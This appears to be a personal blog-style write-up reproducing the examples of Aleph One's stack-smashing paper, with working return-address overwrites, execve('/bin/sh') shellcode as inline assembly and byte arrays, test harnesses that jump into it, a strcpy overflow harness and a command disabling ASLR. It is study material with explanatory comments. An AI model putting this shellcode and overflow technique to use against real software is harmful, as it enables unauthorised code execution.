For example 3 in Aleph One's "Smashing the Stack for Fun and Profit" paper, the offset values in the following code did not work on my Kali Linux 2025.2 system: I could not get execution to jump past the `x = 1;` assignment.
ret = buffer1 + 12;
(*ret) += 8;
Below is the piece of code that worked on both Kali 2025.2 and Ubuntu 10.04. It was compiled as shown below, with address space randomization disabled.
gcc -o out example3_bof_alphone.c -ggdb -m32
echo 0 | sudo tee /proc/sys/kernel/randomize_va_space
The following piece of code, with offsets of 13 and 8, worked on both systems.
#include
/*
 * Demonstration function for the paper's "example 3". The parameters and
 * buffer2 are never used; the function's only job is to write through a
 * pointer that has been aimed past the end of buffer1 at the saved return
 * address in its own stack frame.
 *
 * The offset 13 was found empirically for the author's build (see the text
 * above: the paper's 12 did not work on Kali 2025.2). buffer1 + 13 is
 * outside the array, so the arithmetic is undefined behaviour in C and the
 * correct value depends entirely on how the compiler lays out the frame.
 * Adding 8 is meant to move the return address past the "x = 1;" that
 * follows the call in main.
 * NOTE(review): a stack-protector canary sits between the locals and the
 * saved return address and would abort at return; the page does not say
 * which protector setting the build used.
 */
void function(int a, int b, int c) {
char buffer1[5];
char buffer2[10];
int *ret;
/* aim ret at the saved return address (frame-layout specific, UB in C) */
ret = (int *)(buffer1 + 13);
/* resume 8 bytes further into main than the call would normally return to */
(*ret) += 8;
}
/*
 * Driver for the demo. function() tampers with its own return address so
 * that, when the offsets are right, control resumes after the "x = 1;" line
 * and the program prints 0. If the offset is wrong the program prints 1
 * (the case the text above reports) or crashes.
 * printf needs <stdio.h>; the header name is missing from the #include above
 * (presumably lost when the page was rendered).
 */
int main() {
int x;
x = 0;
function(1,2,3);
x = 1;   /* the assignment the tampered return address is meant to skip */
printf("%d\n", x);
}
For shellcodeasm.c, the following formatting helped to get it working:
/*
 * Stand-alone version of the paper's shellcode, written as inline asm so it
 * can be assembled and its bytes extracted (they appear as the shellcode[]
 * array in testsc.c below).
 *
 * Control flow: jmp forward to jmp_here, then call back to call_here. The
 * call pushes the address of the ".string" that follows it, and "popl %esi"
 * recovers that address without needing to know where the code is loaded.
 * The stores at 0x7/0x8/0xc(%esi) then build the argument block in place
 * around that string; the first "int $0x80" is system call 0xb (execve on
 * 32-bit Linux) and the second, with %eax = 1, is exit, so the process does
 * not run on into the string data if the first call returns.
 *
 * The "movb $0x0" / "movl $0x0" immediates encode as zero bytes in the
 * resulting machine code (visible as \x00 in testsc.c below); that is what
 * shellcodeasm2.c later removes with xor/register moves.
 * "void main()" is non-standard — C requires main to return int, as the
 * other listings on this page do.
 */
void main(){
__asm__(
"jmp jmp_here\n\t"
"call_here:\n\t"
"popl %esi\n\t"               /* %esi = address of the string pushed by the call */
"movl %esi,0x8(%esi)\n\t"     /* store the string's address 8 bytes past it */
"movb $0x0,0x7(%esi)\n\t"     /* terminate the string (zero byte in the encoding) */
"movl $0x0,0xc(%esi)\n\t"     /* zero word after it (zero bytes in the encoding) */
"movl $0xb,%eax\n\t"          /* system call number 0xb */
"movl %esi,%ebx\n\t"
"leal 0x8(%esi),%ecx\n\t"
"leal 0xc(%esi),%edx\n\t"
"int $0x80\n\t"
"movl $0x1, %eax\n\t"         /* system call 1: exit, reached only if the first returns */
"movl $0x0, %ebx\n\t"
"int $0x80\n\t"
"jmp_here:\n\t"
"call call_here\n\t"          /* pushes the address of the string below */
".string \"/bin/sh\"\n\t");
}
The following code, testsc.c, runs well on Ubuntu 10.04.
/*
 * Byte encoding of the instructions in shellcodeasm.c above. It still
 * contains \x00 bytes (from the "movb $0x0" / "movl $0x0" immediates), so a
 * NUL-terminated string copy would stop partway through it; testsc.c below
 * never copies the array, it only jumps to it. The bytes after the
 * "/bin/sh\0" text (\x5d\xc3) look like the compiled function's epilogue
 * rather than part of the payload — TODO confirm.
 */
char shellcode[] =
"\xeb\x2a\x5e\x89\x76\x08\xc6\x46\x07\x00\xc7\x46\x0c\x00\x00\x00\x00\xb8\x0b\x00\x00\x00\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\xb8\x01\x00\x00\x00\xbb\x00\x00\x00\x00\xcd\x80\xe8\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x5d\xc3";
/*
 * Test harness for the shellcode bytes: overwrite main's own saved return
 * address with the address of shellcode[], so that returning from main
 * transfers control into the array. "&ret + 2" is the distance (in ints)
 * from the local to the saved return address that the author found on
 * Ubuntu 10.04; it is frame-layout specific and undefined behaviour as far
 * as the C language is concerned.
 * NOTE(review): shellcode[] lives in writable data, which current toolchains
 * and kernels map non-executable by default; the text above only claims this
 * listing for Ubuntu 10.04, so on a current system expect a fault at the
 * return rather than a shell.
 */
int main(){
int * ret;
ret = (int *)&ret + 2;    /* aim at main's saved return address */
(*ret) = (int)shellcode;  /* pointer narrowed to int: only sound for the -m32 build */
}
The following worked for shellcodeasm2.c.
/*
 * Second version of the inline-asm shellcode (shellcodeasm2.c). Same
 * structure as shellcodeasm.c above — jmp/call/pop to find the trailing
 * string, build the argument block next to it, system call 0xb, then exit —
 * but every instruction that previously carried a zero immediate is
 * rewritten: %eax is zeroed with xorl and then used as the stored zero,
 * the call number is loaded with "movb $0xb,%al", and exit's %eax = 1 is
 * produced with xor + inc. The effect is that the encoded bytes (the
 * shellcode[] array in testsc2.c below) contain no \x00, so the payload
 * survives a NUL-terminated string copy; the trade-off is that it is a
 * little harder to read than the first version.
 */
int main(){
__asm__(
"jmp before_call\n\t"
"before_pop:\n\t"
"popl %esi\n\t"               /* %esi = address of the string pushed by the call */
"movl %esi,0x8(%esi)\n\t"
"xorl %eax,%eax\n\t"          /* zero without a zero immediate */
"movb %eax,0x7(%esi)\n\t"     /* terminate the string */
"movl %eax,0xc(%esi)\n\t"
"movb $0xb,%al\n\t"           /* system call number 0xb, one-byte immediate */
"movl %esi,%ebx\n\t"
"leal 0x8(%esi),%ecx\n\t"
"leal 0xc(%esi),%edx\n\t"
"int $0x80\n\t"
"xorl %ebx,%ebx\n\t"
"movl %ebx,%eax\n\t"
"inc %eax\n\t"                /* %eax = 1: exit, reached only if the first call returns */
"int $0x80\n\t"
"before_call:\n\t"
"call before_pop\n\t"         /* pushes the address of the string below */
".string \"/bin/sh\"\n\t"
);
}
Below is the working piece of code for testsc2.c.
/*
 * Byte encoding of shellcodeasm2.c above. Unlike the first shellcode[] this
 * one contains no \x00 bytes before the string's own terminator, which is
 * what lets the strcpy-based listing at the end of the page carry it. The
 * two bytes after the "/bin/sh\0" text (\x4d\xc3) are presumably leftover
 * function-epilogue bytes; they are never reached because control never
 * continues past the string.
 */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x00\x4d\xc3";
/*
 * Test harness for the second shellcode, identical in structure to testsc.c
 * above: point at main's own saved return address ("&ret + 2" ints away in
 * the author's frame layout — undefined behaviour in C and compiler
 * specific) and replace it with the address of shellcode[], so returning
 * from main jumps into the array.
 * NOTE(review): the array is writable data; on a current system it is mapped
 * non-executable by default, so expect a fault at the return rather than a
 * shell unless the build deliberately opts out.
 */
int main(){
int *ret;
ret = (int *)&ret + 2;    /* aim at main's saved return address */
(*ret) = (int)shellcode;  /* pointer narrowed to int: only sound for the -m32 build */
}
I had to increase the large_string array size for the RET to be overwritten as shown below.
#include
/*
 * The NUL-free shellcode from testsc2.c with the "/bin/sh" text appended as
 * plain characters and no trailing epilogue bytes; because the only NUL is
 * the literal's own terminator, strlen() below sees the whole payload and
 * strcpy() can carry it intact.
 *
 * large_string is the attack string the paper calls the "large string":
 * 136 bytes = 34 longs of 4 bytes (matching the loop bound in main). The
 * author reports enlarging it from the paper's size so that the copy into
 * the 96-byte buffer reaches the saved return address on both test systems.
 */
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh";
char large_string[136];
/*
 * The paper's "overflow1" harness with large_string enlarged to 136 bytes.
 * Three steps:
 *   1. fill every 4-byte slot of large_string with the address of buffer
 *      (34 slots x 4 bytes = 136, so the loop bound matches the array);
 *   2. overwrite the start of large_string with the shellcode bytes;
 *   3. strcpy large_string into the 96-byte buffer.
 * Step 3 is the overflow: strcpy has no bound and stops only at a NUL, and
 * once large_string is full of address bytes it normally contains none
 * (unless an address happens to contain a zero byte), so the copy writes
 * the whole 136 bytes — and reads on past the array until it finds a NUL —
 * into a 96-byte buffer, clobbering what sits above it, including the saved
 * return address, which now holds buffer's own address.
 *
 * This is exactly the defect the paper is about: a bounded copy (memcpy or
 * snprintf with sizeof buffer) cannot overrun, and a stack-protector canary
 * would abort before the tampered return address is used.
 * strlen/strcpy need <string.h>; the header name is missing from the
 * #include above (presumably lost when the page was rendered).
 */
int main(){
char buffer[96];
int i;
long * long_ptr = (long *) large_string;
/* step 1: every slot = address of buffer (pointer narrowed to int, -m32 only) */
for (i=0; i<34; i++)
*(long_ptr + i) = (int) buffer;
/* step 2: shellcode prefix; strlen is re-evaluated each iteration and the
   int/size_t comparison is signed-vs-unsigned — harmless here, but -Wall will warn */
for (i=0; i < strlen(shellcode); i++)
large_string[i] = shellcode[i];
/* step 3: the unbounded copy that overruns buffer */
strcpy(buffer, large_string);
}
Contact Me: jithesh82 AT G mail